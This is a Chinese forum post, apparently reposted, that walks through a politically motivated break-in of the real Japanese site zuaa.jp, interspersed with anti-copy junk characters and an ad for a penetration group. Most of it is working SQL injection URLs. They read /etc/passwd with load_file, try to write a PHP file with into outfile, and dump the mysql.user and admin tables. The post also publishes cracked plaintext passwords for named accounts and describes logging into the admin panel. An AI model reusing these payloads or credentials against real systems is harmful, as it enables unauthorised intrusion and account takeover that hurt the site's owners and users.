原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

9 o0 o* Q8 o0 s9 N( E! L
% B2 X7 ]* M. Y- h0x01. 检测 www.zuaa.jp 收集数据


whatweb
, f. E( [2 B5 {( f
+ z0 A. u! r( ^* N
0 m, R2 s. [! ^9 @, N8 z+ N利用NMAP扫描
* L2 M1 {8 `3 ^8 N, n, s8 c# I
# ]) @- c* K" V中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
" [, w3 O7 I6 a; K! _0x02.找注入点
* L6 f9 {6 N7 R, E5 C0 P找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
6 w2 i! a" y2 h$ ?  D9 t9 L0 `
; l6 K3 n: R& J1 F2 z6 l# n
* e7 z) |6 R4 l* ^5 L1 F+ i6 \3 I0x03.order by
# x9 {" }7 b% v! E             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
- k& F4 F% g" v  a5 s
- N+ j4 c. I" Korder by 28报错，order by 27正常
  q6 d3 m# e* ~1 _2 u
( C2 D5 L) c, m9 o! c7 X6 r' z0x04.   union手动查询
( q/ V7 R* d' M/ shttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
8 w, R; J% i6 h8 ?, I
0x05. info:
( K) c7 K8 W) I' ^4 O) R1 Yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
2 c9 b/ S% t' g5 J, z
user:            root@localhost
database:    openpne
& [6 U; I8 U: a- `8 T* M2 T4 x8 Vversion:      4.1.22
2 F2 ]& x4 |& ^os:             portbld-freebsd5.4
- }( x! W4 w+ D
0x06. root用户
/ x' `3 N! k1 b% [! e+ N利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

9 O, {( {& Z' Q/ c* x% u通过工具转换
4 j8 L+ `/ J5 f, V. T
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
4 t5 M5 \  j3 c2 A) u
0x07. 利用 into outfile
  q9 @+ S# ]2 ^, y5 \: i全部都失败
9 l8 X2 C, H6 W2 G! L/ n8 Jhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
! u5 S: R' Y: K( X. I4 X
0 ?1 y- k* n9 L' m3 t  q; xhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

2 a: \$ }; W6 Y( O' t8 Z: R; X页面显示“MDB2 Error:syntax error”
1 m5 T; w' ~0 H3 X- ]- K
& t: ~$ C. Y3 I; D* h7 W0x08. 利用 mysql 4.1
% K/ [$ f! n! o6 T1 W猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持



/ \6 i, h$ q0 V3 m8 h" N8 _0x09. 查找后台
利用 现有的各种 后台工具尝试都不行

0x10.  MySL外联方法
3 M  W6 e. J5 x# I# b从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
' `0 M' K& _, s" b, d+ V可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
/ n3 L* g! S% d! e8 F1 T; V! qhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
5 h  M% E0 O/ U, l) w" f. p
这个可以在 www.cmd5.com 解密
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
6 V3 ^3 k, v8 f& u  Qopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
1 p* ]2 w9 g1 A工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
# [0 c  P0 \; b- d+ |7 h

0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码
+ k" p3 k- _- R

6 v1 s# N4 @! C0x12. 默认信息利用
2 o9 L! i+ o# d; z4 s/ Khttp://sns.zuaa.jp/?m=admin&a=page_login
' }7 a4 R# v% d6 z' x8 z
0 D. Y2 |. _" j8 N; h表名 (c_admin_user) ，字段名（username,password）
0 h  |* c- m5 y& t& z* {" l8 o6 phttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

解密
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
% w6 {: H& m8 E' E$ F8 rzuaajp:c0923ec5857796a393da99905008c176,          zju1897
$ G* W; ~, W  c' V
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

1 g9 E# c* B; [0x13. 登录后台



- f2 i2 ?1 {) F& W0x14. 小结
( [8 }6 r6 G8 x1 J. C+ [利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
/ [0 M& K% x& C$ u  h( Y感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
1 Y. J5 r% W8 \0 a  E中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

4 `! N1 A- n9 w" F3 h最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
, W* W) f/ g. f* V1 \+ f

荒村狂客

哪个牛人 费的这劲 入侵的